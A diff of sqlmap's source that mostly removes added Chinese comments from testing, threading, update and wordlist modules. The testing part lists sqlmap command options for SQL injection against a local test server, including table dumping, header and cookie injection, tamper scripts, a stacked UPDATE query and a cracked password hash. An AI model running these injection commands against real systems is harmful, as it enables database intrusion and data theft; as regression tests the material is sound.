+        ("-u <base> --flush-session -H \"Foo: Bar\" -H \"Sna: Fu\" --data=\"<root><param name=\\\"id\\\" value=\\\"1*\\\"/></root>\" --union-char=1 --mobile --answers=\"smartphone=3\" --banner --smart -v 5", ("might be injectable", "Payload: <root><param name=\"id\" value=\"1", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", "banner: '3.", "Nexus", "Sna: Fu", "Foo: Bar")),
+        ("-u <base> --flush-session --technique=BU --method=PUT --data=\"a=1;id=1;b=2\" --param-del=\";\" --skip-static --har=<tmpfile> --dump -T users --start=1 --stop=2", ("might be injectable", "Parameter: id (PUT)", "Type: boolean-based blind", "Type: UNION query", "2 entries")),
+        ("-u <url> --flush-session -H \"id: 1*\" --tables -t <tmpfile>", ("might be injectable", "Parameter: id #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")),
+        ("-u <url> --flush-session --banner --invalid-logical --technique=B --predict-output --test-filter=\"OR boolean\" --tamper=space2dash", ("banner: '3.", " LIKE ")),
+        ("-u <url> --flush-session --cookie=\"PHPSESSID=d41d8cd98f00b204e9800998ecf8427e; id=1*; id2=2\" --tables --union-cols=3", ("might be injectable", "Cookie #1* ((custom) HEADER)", "Type: boolean-based blind", "Type: time-based blind", "Type: UNION query", " users ")),
+        ("-u <url> --flush-session --null-connection --technique=B --tamper=between,randomcase --banner --count -T users", ("NULL connection is supported with HEAD method", "banner: '3.", "users | 5")),
+        ("-u <base> --data=\"aWQ9MQ==\" --flush-session --base64=POST -v 6", ("aWQ9MTtXQUlURk9SIERFTEFZICcwOjA",)),
+        ("-u <url> --flush-session --parse-errors --test-filter=\"subquery\" --eval=\"import hashlib; id2=2; id3=hashlib.md5(id.encode()).hexdigest()\" --referer=\"localhost\"", ("might be injectable", ": syntax error", "back-end DBMS: SQLite", "WHERE or HAVING clause (subquery")),
+        ("-u <url> --banner --schema --dump -T users --binary-fields=surname --where \"id>3\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "2 entries", "6E616D6569736E756C6C")),
+        ("-u <url> --technique=U --fresh-queries --force-partial --dump -T users --dump-format=HTML --answers=\"crack=n\" -v 3", ("performed 6 queries", "nameisnull", "~using default dictionary", "dumped to HTML file")),
+        ("-u <url> --flush-session --technique=BU --all", ("5 entries", "Type: boolean-based blind", "Type: UNION query", "luther", "blisset", "fluffy", "179ad45c6ce2cb97cf1029e212046e81", "NULL", "nameisnull", "testpass")),
+        ("-u <url> -z \"tec=B\" --hex --fresh-queries --threads=4 --sql-query=\"SELECT * FROM users\"", ("SELECT * FROM users [5]", "nameisnull")),
+        ("-u \"<url>&echo=foobar*\" --flush-session", ("might be vulnerable to cross-site scripting",)),
+        ("-u \"<url>&query=*\" --flush-session --technique=Q --banner", ("Title: SQLite inline queries", "banner: '3.")),
+        ("-d \"<direct>\" --flush-session --dump -T users --dump-format=SQLITE --binary-fields=name --where \"id=3\"", ("7775", "179ad45c6ce2cb97cf1029e212046e81 (testpass)", "dumped to SQLITE database")),
+        ("-d \"<direct>\" --flush-session --banner --schema --sql-query=\"UPDATE users SET name='foobar' WHERE id=5; SELECT * FROM users; SELECT 987654321\"", ("banner: '3.", "INTEGER", "TEXT", "id", "name", "surname", "5, foobar, nameisnull", "'987654321'",)),
+        ("--purge -v 3", ("~ERROR", "~CRITICAL", "deleting the whole directory tree")),
    )

-    retVal = True  # 存储测试结果
-    count = 0  # 测试计数器
+    retVal = True
+    count = 0

-    # 寻找可用的端口
    while True:
        address, port = "127.0.0.1", random.randint(10000, 65535)
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-            if s.connect_ex((address, port)):  # 尝试连接端口
+            if s.connect_ex((address, port)):
                break
            else:
                time.sleep(1)
        finally:
            s.close()

-    # 定义运行漏洞服务器的线程函数
    def _thread():
        vulnserver.init(quiet=True)
        vulnserver.run(address=address, port=port)

    vulnserver._alive = True

-    # 启动漏洞服务器线程
    thread = threading.Thread(target=_thread)
    thread.daemon = True
    thread.start()

-    # 等待服务器启动完成
    while vulnserver._alive:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
@ -95,57 +122,46 @@ def vulnTest():
            s.close()
        time.sleep(1)

-    # 检查服务器是否成功启动
    if not vulnserver._alive:
        logger.error("problem occurred in vulnserver instantiation (address: 'http://%s:%s')" % (address, port))
        return False
    else:
        logger.info("vulnserver running at 'http://%s:%s'..." % (address, port))

-    # 创建临时配置文件
    handle, config = tempfile.mkstemp(suffix=".conf")
    os.close(handle)

-    # 创建临时SQLite数据库
    handle, database = tempfile.mkstemp(suffix=".sqlite")
    os.close(handle)

-    # 初始化数据库架构
    with sqlite3.connect(database) as conn:
        c = conn.cursor()
        c.executescript(vulnserver.SCHEMA)

-    # 创建临时请求文件
    handle, request = tempfile.mkstemp(suffix=".req")
    os.close(handle)

-    # 创建临时日志文件
    handle, log = tempfile.mkstemp(suffix=".log")
    os.close(handle)

-    # 创建临时多目标文件
    handle, multiple = tempfile.mkstemp(suffix=".lst")
    os.close(handle)

-    # 准备HTTP请求内容
    content = "POST / HTTP/1.0\nUser-Agent: foobar\nHost: %s:%s\n\nid=1\n" % (address, port)
    with open(request, "w+") as f:
        f.write(content)
        f.flush()

-    # 准备日志内容
    content = '<port>%d</port><request base64="true"><![CDATA[%s]]></request>' % (port, encodeBase64(content, binary=False))
    with open(log, "w+") as f:
        f.write(content)
        f.flush()

-    # 设置基本URL和测试参数
    base = "http://%s:%d/" % (address, port)
    url = "%s?id=1" % base
    direct = "sqlite3://%s" % database
    tmpdir = tempfile.mkdtemp()

-    # 读取并修改配置文件
    with open(os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.conf"))) as f:
        content = f.read().replace("url =", "url = %s" % url)

@ -153,45 +169,31 @@ def vulnTest():
        f.write(content)
        f.flush()

-    # 准备多目标测试文件
    content = "%s?%s=%d\n%s?%s=%d\n%s&%s=1" % (base, randomStr(), randomInt(), base, randomStr(), randomInt(), url, randomStr())
    with open(multiple, "w+") as f:
        f.write(content)
        f.flush()

-    # 执行所有测试用例
    for options, checks in TESTS:
        status = '%d/%d (%d%%) ' % (count, len(TESTS), round(100.0 * count / len(TESTS)))
        dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status))

-        # Windows系统特殊字符处理
        if IS_WIN and "uraj" in options:
            options = options.replace(u"\u0161u\u0107uraj", "sucuraj")
            checks = [check.replace(u"\u0161u\u0107uraj", "sucuraj") for check in checks]

-        # 替换测试命令中的占位符
-        for tag, value in (("<url>", url), ("<base>", base), ("<direct>", direct), ("<tmpdir>", tmpdir), 
-                          ("<request>", request), ("<log>", log), ("<multiple>", multiple), 
-                          ("<config>", config), ("<base64>", url.replace("id=1", "id=MZ=%3d"))):
+        for tag, value in (("<url>", url), ("<base>", base), ("<direct>", direct), ("<tmpdir>", tmpdir), ("<request>", request), ("<log>", log), ("<multiple>", multiple), ("<config>", config), ("<base64>", url.replace("id=1", "id=MZ=%3d"))):
            options = options.replace(tag, value)

-        # 构建完整的测试命令
-        cmd = "%s \"%s\" %s --batch --non-interactive --debug --time-sec=1" % (
-            sys.executable if ' ' not in sys.executable else '"%s"' % sys.executable,
-            os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.py")),
-            options
-        )
+        cmd = "%s \"%s\" %s --batch --non-interactive --debug --time-sec=1" % (sys.executable if ' ' not in sys.executable else '"%s"' % sys.executable, os.path.abspath(os.path.join(os.path.dirname(__file__), "..", "..", "sqlmap.py")), options)

-        # 处理临时文件
        if "<tmpfile>" in cmd:
            handle, tmp = tempfile.mkstemp()
            os.close(handle)
            cmd = cmd.replace("<tmpfile>", tmp)

-        # 执行测试命令并检查输出
        output = shellExec(cmd)

-        # 验证测试结果
        if not all((check in output if not check.startswith('~') else check[1:] not in output) for check in checks) or "unhandled exception" in output:
            dataToStdout("---\n\n$ %s\n" % cmd)
            dataToStdout("%s---\n" % output, coloring=False)
@ -199,7 +201,6 @@ def vulnTest():

        count += 1

-    # 清理并显示最终结果
    clearConsoleLine()
    if retVal:
        logger.info("vuln test final result: PASSED")
@ -210,13 +211,11 @@ def vulnTest():

 def smokeTest():
    """
-    运行程序的基本冒烟测试
-    验证基本功能是否正常工作
+    Runs the basic smoke testing of a program
    """

-    unisonRandom()  # 初始化随机数生成器
+    unisonRandom()

-    # 验证错误正则表达式的有效性
    with open(paths.ERRORS_XML, "r") as f:
        content = f.read()

@ -231,7 +230,6 @@ def smokeTest():
    retVal = True
    count, length = 0, 0

-    # 统计需要测试的Python文件数量
    for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH):
        if any(_ in root for _ in ("thirdparty", "extra", "interbase")):
            continue
@ -240,7 +238,6 @@ def smokeTest():
            if os.path.splitext(filename)[1].lower() == ".py" and filename != "__init__.py":
                length += 1

-    # 对每个Python文件进行测试
    for root, _, files in os.walk(paths.SQLMAP_ROOT_PATH):
        if any(_ in root for _ in ("thirdparty", "extra", "interbase")):
            continue
@ -262,7 +259,6 @@ def smokeTest():
                    logger.setLevel(logging.CRITICAL)
                    kb.smokeMode = True

-                    # 运行文档测试
                    (failure_count, _) = doctest.testmod(module)

                    kb.smokeMode = False
@ -275,7 +271,6 @@ def smokeTest():
                status = '%d/%d (%d%%) ' % (count, length, round(100.0 * count / length))
                dataToStdout("\r[%s] [INFO] complete: %s" % (time.strftime("%X"), status))

-    # 验证正则表达式的递归函数
    def _(node):
        for __ in dir(node):
            if not __.startswith('_'):
@ -291,14 +286,12 @@ def smokeTest():
                else:
                    _(candidate)

-    # 验证所有数据库查询中的正则表达式
    for dbms in queries:
        try:
            _(queries[dbms])
        except:
            retVal = False

-    # 显示最终测试结果
    clearConsoleLine()
    if retVal:
        logger.info("smoke test final result: PASSED")
--- a/src/sqlmap-master/lib/core/threads.py
+++ b/src/sqlmap-master/lib/core/threads.py
@ -5,39 +5,35 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入需要的模块
 from __future__ import print_function

-import difflib  # 用于比较文本差异
-import sqlite3  # SQLite数据库支持
-import threading  # 多线程支持
-import time  # 时间相关功能
-import traceback  # 异常追踪
-
-# 导入自定义模块
-from lib.core.compat import WichmannHill  # 随机数生成器
-from lib.core.compat import xrange  # 兼容Python2和3的range函数
-from lib.core.data import conf  # 配置数据
-from lib.core.data import kb  # 知识库数据
-from lib.core.data import logger  # 日志记录器
-from lib.core.datatype import AttribDict  # 属性字典类型
-from lib.core.enums import PAYLOAD  # 载荷类型枚举
-from lib.core.exception import SqlmapBaseException  # 基础异常类
-from lib.core.exception import SqlmapConnectionException  # 连接异常
-from lib.core.exception import SqlmapSkipTargetException  # 跳过目标异常
-from lib.core.exception import SqlmapThreadException  # 线程异常
-from lib.core.exception import SqlmapUserQuitException  # 用户退出异常
-from lib.core.exception import SqlmapValueException  # 值错误异常
-from lib.core.settings import MAX_NUMBER_OF_THREADS  # 最大线程数
-from lib.core.settings import PYVERSION  # Python版本信息
-
-# 创建共享数据对象
+import difflib
+import sqlite3
+import threading
+import time
+import traceback
+
+from lib.core.compat import WichmannHill
+from lib.core.compat import xrange
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.datatype import AttribDict
+from lib.core.enums import PAYLOAD
+from lib.core.exception import SqlmapBaseException
+from lib.core.exception import SqlmapConnectionException
+from lib.core.exception import SqlmapSkipTargetException
+from lib.core.exception import SqlmapThreadException
+from lib.core.exception import SqlmapUserQuitException
+from lib.core.exception import SqlmapValueException
+from lib.core.settings import MAX_NUMBER_OF_THREADS
+from lib.core.settings import PYVERSION
+
 shared = AttribDict()

 class _ThreadData(threading.local):
    """
-    表示线程独立的数据
-    每个线程都有自己独立的数据副本
+    Represents thread independent data
    """

    def __init__(self):
@ -45,117 +41,92 @@ class _ThreadData(threading.local):

    def reset(self):
        """
-        重置线程数据模型
-        初始化所有线程局部变量
+        Resets thread data model
        """

-        self.disableStdOut = False  # 是否禁用标准输出
-        self.hashDBCursor = None  # 哈希数据库游标
-        self.inTransaction = False  # 是否在事务中
-        self.lastCode = None  # 最后的HTTP状态码
-        self.lastComparisonPage = None  # 最后比较的页面内容
-        self.lastComparisonHeaders = None  # 最后比较的HTTP头
-        self.lastComparisonCode = None  # 最后比较的状态码
-        self.lastComparisonRatio = None  # 最后比较的相似度
-        self.lastErrorPage = tuple()  # 最后的错误页面
-        self.lastHTTPError = None  # 最后的HTTP错误
-        self.lastRedirectMsg = None  # 最后的重定向消息
-        self.lastQueryDuration = 0  # 最后查询持续时间
-        self.lastPage = None  # 最后的页面内容
-        self.lastRequestMsg = None  # 最后的请求消息
-        self.lastRequestUID = 0  # 最后请求的唯一ID
-        self.lastRedirectURL = tuple()  # 最后重定向的URL
-        self.random = WichmannHill()  # 随机数生成器
-        self.resumed = False  # 是否已恢复
-        self.retriesCount = 0  # 重试次数
-        self.seqMatcher = difflib.SequenceMatcher(None)  # 序列匹配器
-        self.shared = shared  # 共享数据引用
-        self.technique = None  # 当前使用的技术
-        self.validationRun = 0  # 验证运行次数
-        self.valueStack = []  # 值栈
-
-# 创建线程数据实例
+        self.disableStdOut = False
+        self.hashDBCursor = None
+        self.inTransaction = False
+        self.lastCode = None
+        self.lastComparisonPage = None
+        self.lastComparisonHeaders = None
+        self.lastComparisonCode = None
+        self.lastComparisonRatio = None
+        self.lastErrorPage = tuple()
+        self.lastHTTPError = None
+        self.lastRedirectMsg = None
+        self.lastQueryDuration = 0
+        self.lastPage = None
+        self.lastRequestMsg = None
+        self.lastRequestUID = 0
+        self.lastRedirectURL = tuple()
+        self.random = WichmannHill()
+        self.resumed = False
+        self.retriesCount = 0
+        self.seqMatcher = difflib.SequenceMatcher(None)
+        self.shared = shared
+        self.technique = None
+        self.validationRun = 0
+        self.valueStack = []
+
 ThreadData = _ThreadData()

 def readInput(message, default=None, checkBatch=True, boolean=False):
-    # 将被lib.core.common中的原始函数覆盖
+    # It will be overwritten by original from lib.core.common
    pass

 def isDigit(value):
-    # 将被lib.core.common中的原始函数覆盖
+    # It will be overwritten by original from lib.core.common
    pass

 def getCurrentThreadData():
    """
-    返回当前线程的局部数据
+    Returns current thread's local data
    """
+
    return ThreadData

 def getCurrentThreadName():
    """
-    返回当前线程的名称
+    Returns current's thread name
    """
+
    return threading.current_thread().getName()

 def exceptionHandledFunction(threadFunction, silent=False):
-    """
-    异常处理包装函数
-    用于包装线程函数并处理可能发生的异常
-    """
    try:
        threadFunction()
-    except KeyboardInterrupt:  # 处理键盘中断
+    except KeyboardInterrupt:
        kb.threadContinue = False
        kb.threadException = True
        raise
    except Exception as ex:
        from lib.core.common import getSafeExString

-        # 如果不是静默模式且线程应继续运行,且不是多次Ctrl+C,且不是用户退出或跳过目标异常
        if not silent and kb.get("threadContinue") and not kb.get("multipleCtrlC") and not isinstance(ex, (SqlmapUserQuitException, SqlmapSkipTargetException)):
            errMsg = getSafeExString(ex) if isinstance(ex, SqlmapBaseException) else "%s: %s" % (type(ex).__name__, getSafeExString(ex))
            logger.error("thread %s: '%s'" % (threading.currentThread().getName(), errMsg))

-            # 在详细模式下打印完整堆栈跟踪
            if conf.get("verbose") > 1 and not isinstance(ex, SqlmapConnectionException):
                traceback.print_exc()

 def setDaemon(thread):
-    """
-    设置线程为守护线程
-    守护线程会在主程序退出时自动终止
-    """
+    # Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation
    if PYVERSION >= "2.6":
        thread.daemon = True
    else:
        thread.setDaemon(True)

 def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardException=True, threadChoice=False, startThreadMsg=True):
-    """
-    运行多个线程的主函数
-    
-    参数:
-    numThreads - 要运行的线程数
-    threadFunction - 每个线程要执行的函数
-    cleanupFunction - 清理函数(可选)
-    forwardException - 是否转发异常
-    threadChoice - 是否允许用户选择线程数
-    startThreadMsg - 是否显示启动线程消息
-    """
    threads = []

    def _threadFunction():
-        """
-        内部线程函数
-        包装了原始的threadFunction,并确保正确关闭hashDB
-        """
        try:
            threadFunction()
        finally:
            if conf.hashDB:
                conf.hashDB.close()

-    # 初始化线程控制变量
    kb.multipleCtrlC = False
    kb.threadContinue = True
    kb.threadException = False
@ -163,7 +134,6 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
    kb.multiThreadMode = False

    try:
-        # 处理单线程情况下的线程数选择
        if threadChoice and conf.threads == numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)):
            while True:
                message = "please enter number of threads? [Enter for %d (current)] " % numThreads
@ -187,7 +157,6 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
                warnMsg = "running in a single-thread mode. This could take a while"
                logger.warning(warnMsg)

-        # 处理多线程和单线程的执行
        if numThreads > 1:
            if startThreadMsg:
                infoMsg = "starting %d threads" % numThreads
@ -202,7 +171,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio

        kb.multiThreadMode = True

-        # 启动所有线程
+        # Start the threads
        for numThread in xrange(numThreads):
            thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[_threadFunction])

@ -217,7 +186,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio

            threads.append(thread)

-        # 等待所有线程完成
+        # And wait for them to all finish
        alive = True
        while alive:
            alive = False
@ -227,7 +196,6 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
                    time.sleep(0.1)

    except (KeyboardInterrupt, SqlmapUserQuitException) as ex:
-        # 处理用户中断
        print()
        kb.prependFlag = False
        kb.threadContinue = False
@ -253,7 +221,6 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
            raise

    except (SqlmapConnectionException, SqlmapValueException) as ex:
-        # 处理连接和值错误异常
        print()
        kb.threadException = True
        logger.error("thread %s: '%s'" % (threading.currentThread().getName(), ex))
@ -262,7 +229,6 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
            traceback.print_exc()

    except Exception as ex:
-        # 处理其他未预期的异常
        print()

        if not kb.multipleCtrlC:
@ -277,13 +243,11 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
                traceback.print_exc()

    finally:
-        # 清理工作
        kb.multiThreadMode = False
        kb.threadContinue = True
        kb.threadException = False
        kb.technique = None

-        # 释放所有锁
        for lock in kb.locks.values():
            if lock.locked():
                try:
@ -291,10 +255,8 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
                except:
                    pass

-        # 刷新哈希数据库
        if conf.get("hashDB"):
            conf.hashDB.flush(True)

-        # 执行清理函数
        if cleanupFunction:
            cleanupFunction()
--- a/src/sqlmap-master/lib/core/update.py
+++ b/src/sqlmap-master/lib/core/update.py
@ -5,101 +5,86 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入所需的Python标准库
-import glob  # 用于文件路径模式匹配
-import os    # 提供与操作系统交互的功能
-import re    # 正则表达式模块
-import shutil  # 提供高级文件操作功能
-import subprocess  # 用于创建子进程
-import time   # 时间相关功能
-import zipfile  # ZIP文件操作
-
-# 从自定义库中导入所需函数
-from lib.core.common import dataToStdout  # 输出数据到标准输出
-from lib.core.common import extractRegexResult  # 提取正则表达式结果
-from lib.core.common import getLatestRevision  # 获取最新版本号
-from lib.core.common import getSafeExString  # 安全地获取异常字符串
-from lib.core.common import openFile  # 打开文件
-from lib.core.common import pollProcess  # 轮询进程
-from lib.core.common import readInput  # 读取用户输入
-from lib.core.convert import getText  # 文本转换
-from lib.core.data import conf  # 配置数据
-from lib.core.data import logger  # 日志记录器
-from lib.core.data import paths  # 路径信息
-from lib.core.revision import getRevisionNumber  # 获取版本号
-from lib.core.settings import GIT_REPOSITORY  # Git仓库地址
-from lib.core.settings import IS_WIN  # 是否为Windows系统
-from lib.core.settings import VERSION  # 版本信息
-from lib.core.settings import TYPE  # 安装类型
-from lib.core.settings import ZIPBALL_PAGE  # ZIP包下载页面
-from thirdparty.six.moves import urllib as _urllib  # URL处理
+import glob
+import os
+import re
+import shutil
+import subprocess
+import time
+import zipfile
+
+from lib.core.common import dataToStdout
+from lib.core.common import extractRegexResult
+from lib.core.common import getLatestRevision
+from lib.core.common import getSafeExString
+from lib.core.common import openFile
+from lib.core.common import pollProcess
+from lib.core.common import readInput
+from lib.core.convert import getText
+from lib.core.data import conf
+from lib.core.data import logger
+from lib.core.data import paths
+from lib.core.revision import getRevisionNumber
+from lib.core.settings import GIT_REPOSITORY
+from lib.core.settings import IS_WIN
+from lib.core.settings import VERSION
+from lib.core.settings import TYPE
+from lib.core.settings import ZIPBALL_PAGE
+from thirdparty.six.moves import urllib as _urllib

 def update():
-    """
-    更新sqlmap的主函数
-    """
-    # 如果未启用更新全部选项,直接返回
    if not conf.updateAll:
        return

-    success = False  # 更新是否成功的标志
+    success = False

-    # 如果是通过pip安装的
    if TYPE == "pip":
        infoMsg = "updating sqlmap to the latest stable version from the "
        infoMsg += "PyPI repository"
-        logger.info(infoMsg)  # 记录更新信息
+        logger.info(infoMsg)

        debugMsg = "sqlmap will try to update itself using 'pip' command"
-        logger.debug(debugMsg)  # 记录调试信息
+        logger.debug(debugMsg)

-        dataToStdout("\r[%s] [INFO] update in progress" % time.strftime("%X"))  # 显示更新进度
+        dataToStdout("\r[%s] [INFO] update in progress" % time.strftime("%X"))

        output = ""
        try:
-            # 执行pip更新命令
            process = subprocess.Popen("pip install -U sqlmap", shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=paths.SQLMAP_ROOT_PATH)
-            pollProcess(process, True)  # 轮询进程
-            output, _ = process.communicate()  # 获取输出
-            success = not process.returncode  # 检查返回码
+            pollProcess(process, True)
+            output, _ = process.communicate()
+            success = not process.returncode
        except Exception as ex:
            success = False
            output = getSafeExString(ex)
        finally:
            output = getText(output)

-        # 根据更新结果输出相应信息
        if success:
            logger.info("%s the latest revision '%s'" % ("already at" if "already up-to-date" in output else "updated to", extractRegexResult(r"\binstalled sqlmap-(?P<result>\d+\.\d+\.\d+)", output) or extractRegexResult(r"\((?P<result>\d+\.\d+\.\d+)\)", output)))
        else:
            logger.error("update could not be completed ('%s')" % re.sub(r"[^a-z0-9:/\\]+", " ", output).strip())

-    # 如果不是Git仓库
    elif not os.path.exists(os.path.join(paths.SQLMAP_ROOT_PATH, ".git")):
        warnMsg = "not a git repository. It is recommended to clone the 'sqlmapproject/sqlmap' repository "
        warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY
-        logger.warning(warnMsg)  # 提示用户使用git克隆
+        logger.warning(warnMsg)

-        # 检查是否已是最新版本
        if VERSION == getLatestRevision():
            logger.info("already at the latest revision '%s'" % (getRevisionNumber() or VERSION))
            return

-        # 询问用户是否尝试下载ZIP包更新
        message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]"
        if readInput(message, default='N', boolean=True):
            directory = os.path.abspath(paths.SQLMAP_ROOT_PATH)

            try:
-                # 尝试创建/更新主程序文件
                open(os.path.join(directory, "sqlmap.py"), "w+b")
            except Exception as ex:
                errMsg = "unable to update content of directory '%s' ('%s')" % (directory, getSafeExString(ex))
                logger.error(errMsg)
            else:
-                # 保存原文件属性
                attrs = os.stat(os.path.join(directory, "sqlmap.py")).st_mode
-                # 清理目录内容
                for wildcard in ('*', ".*"):
                    for _ in glob.glob(os.path.join(directory, wildcard)):
                        try:
@ -110,13 +95,11 @@ def update():
                        except:
                            pass

-                # 检查目录是否清空
                if glob.glob(os.path.join(directory, '*')):
                    errMsg = "unable to clear the content of directory '%s'" % directory
                    logger.error(errMsg)
                else:
                    try:
-                        # 下载并解压最新的ZIP包
                        archive = _urllib.request.urlretrieve(ZIPBALL_PAGE)[0]

                        with zipfile.ZipFile(archive) as f:
@ -125,7 +108,6 @@ def update():
                                if info.filename:
                                    f.extract(info, directory)

-                        # 获取并显示新版本信息
                        filepath = os.path.join(paths.SQLMAP_ROOT_PATH, "lib", "core", "settings.py")
                        if os.path.isfile(filepath):
                            with openFile(filepath, "rb") as f:
@ -139,12 +121,10 @@ def update():
                            logger.error("update could not be completed")
                        else:
                            try:
-                                # 恢复文件属性
                                os.chmod(os.path.join(directory, "sqlmap.py"), attrs)
                            except OSError:
                                logger.warning("could not set the file attributes of '%s'" % os.path.join(directory, "sqlmap.py"))

-    # 如果是Git仓库
    else:
        infoMsg = "updating sqlmap to the latest development revision from the "
        infoMsg += "GitHub repository"
@ -157,7 +137,6 @@ def update():

        output = ""
        try:
-            # 执行git更新命令
            process = subprocess.Popen("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd=paths.SQLMAP_ROOT_PATH)
            pollProcess(process, True)
            output, _ = process.communicate()
@ -168,7 +147,6 @@ def update():
        finally:
            output = getText(output)

-        # 根据git更新结果输出信息
        if success:
            logger.info("%s the latest revision '%s'" % ("already at" if "Already" in output else "updated to", getRevisionNumber()))
        else:
@ -179,7 +157,6 @@ def update():
            else:
                logger.error("update could not be completed ('%s')" % re.sub(r"\W+", " ", output).strip())

-    # 如果更新失败,根据操作系统给出建议
    if not success:
        if IS_WIN:
            infoMsg = "for Windows platform it's recommended "
--- a/src/sqlmap-master/lib/core/wordlist.py
+++ b/src/sqlmap-master/lib/core/wordlist.py
@ -5,22 +5,18 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入处理zip文件的模块
 import zipfile

-# 导入一些工具函数和异常类
-from lib.core.common import getSafeExString  # 用于安全地获取异常信息的字符串表示
-from lib.core.common import isZipFile  # 用于判断文件是否为zip格式
-from lib.core.exception import SqlmapDataException  # sqlmap数据相关异常
-from lib.core.exception import SqlmapInstallationException  # sqlmap安装相关异常
-from thirdparty import six  # Python 2/3 兼容性库
+from lib.core.common import getSafeExString
+from lib.core.common import isZipFile
+from lib.core.exception import SqlmapDataException
+from lib.core.exception import SqlmapInstallationException
+from thirdparty import six

 class Wordlist(six.Iterator):
    """
-    用于遍历大型字典文件的迭代器类。
-    这个类可以处理普通文本文件和zip压缩文件中的字典。
-    支持多进程并行处理,可以将工作负载分配给不同进程。
-    
+    Iterator for looping over a large dictionaries
+
    >>> from lib.core.option import paths
    >>> isinstance(next(Wordlist(paths.SMALL_DICT)), six.binary_type)
    True
@ -29,100 +25,69 @@ class Wordlist(six.Iterator):
    """

    def __init__(self, filenames, proc_id=None, proc_count=None, custom=None):
-        """
-        初始化函数
-        :param filenames: 字典文件名(可以是单个字符串或字符串列表)
-        :param proc_id: 当前进程的ID(用于多进程并行处理)
-        :param proc_count: 总进程数
-        :param custom: 自定义的额外词列表(可选)
-        """
-        # 确保filenames始终是列表格式
        self.filenames = [filenames] if isinstance(filenames, six.string_types) else filenames
-        self.fp = None  # 当前打开的文件对象
-        self.index = 0  # 当前正在处理的文件索引
-        self.counter = -1  # 已处理的行数计数器(从-1开始)
-        self.current = None  # 当前正在处理的文件名
-        self.iter = None  # 当前文件的迭代器对象
-        self.custom = custom or []  # 存储自定义词列表,如果没有则为空列表
-        self.proc_id = proc_id  # 当前进程的ID
-        self.proc_count = proc_count  # 总进程数
-        self.adjust()  # 初始化完成后,调整文件指针和迭代器状态
+        self.fp = None
+        self.index = 0
+        self.counter = -1
+        self.current = None
+        self.iter = None
+        self.custom = custom or []
+        self.proc_id = proc_id
+        self.proc_count = proc_count
+        self.adjust()

    def __iter__(self):
-        """
-        实现迭代器协议的__iter__方法
-        使得这个类的实例可以在for循环中使用
-        """
        return self

    def adjust(self):
-        """
-        调整文件指针和迭代器的状态
-        在切换到新文件或重置迭代器时使用
-        """
-        self.closeFP()  # 首先关闭当前打开的文件(如果有)
-        
+        self.closeFP()
        if self.index > len(self.filenames):
-            return  # 如果已经处理完所有文件,直接返回
+            return  # Note: https://stackoverflow.com/a/30217723 (PEP 479)
        elif self.index == len(self.filenames):
-            self.iter = iter(self.custom)  # 如果处理完所有文件,切换到自定义词列表
+            self.iter = iter(self.custom)
        else:
-            self.current = self.filenames[self.index]  # 获取当前要处理的文件名
-            if isZipFile(self.current):  # 判断是否为zip文件
+            self.current = self.filenames[self.index]
+            if isZipFile(self.current):
                try:
-                    _ = zipfile.ZipFile(self.current, 'r')  # 尝试打开zip文件
+                    _ = zipfile.ZipFile(self.current, 'r')
                except zipfile.error as ex:
                    errMsg = "something appears to be wrong with "
                    errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
                    errMsg += "sure that you haven't made any changes to it"
                    raise SqlmapInstallationException(errMsg)
-                if len(_.namelist()) == 0:  # 检查zip文件是否为空
+                if len(_.namelist()) == 0:
                    errMsg = "no file(s) inside '%s'" % self.current
                    raise SqlmapDataException(errMsg)
-                self.fp = _.open(_.namelist()[0])  # 打开zip中的第一个文件
+                self.fp = _.open(_.namelist()[0])
            else:
-                self.fp = open(self.current, "rb")  # 以二进制模式打开普通文件
-            self.iter = iter(self.fp)  # 创建文件内容的迭代器
+                self.fp = open(self.current, "rb")
+            self.iter = iter(self.fp)

-        self.index += 1  # 更新文件索引,为处理下一个文件做准备
+        self.index += 1

    def closeFP(self):
-        """
-        关闭当前打开的文件
-        防止资源泄露
-        """
        if self.fp:
            self.fp.close()
            self.fp = None

    def __next__(self):
-        """
-        实现迭代器的next方法
-        返回字典中的下一个词
-        支持多进程处理时的任务分配
-        """
        retVal = None
        while True:
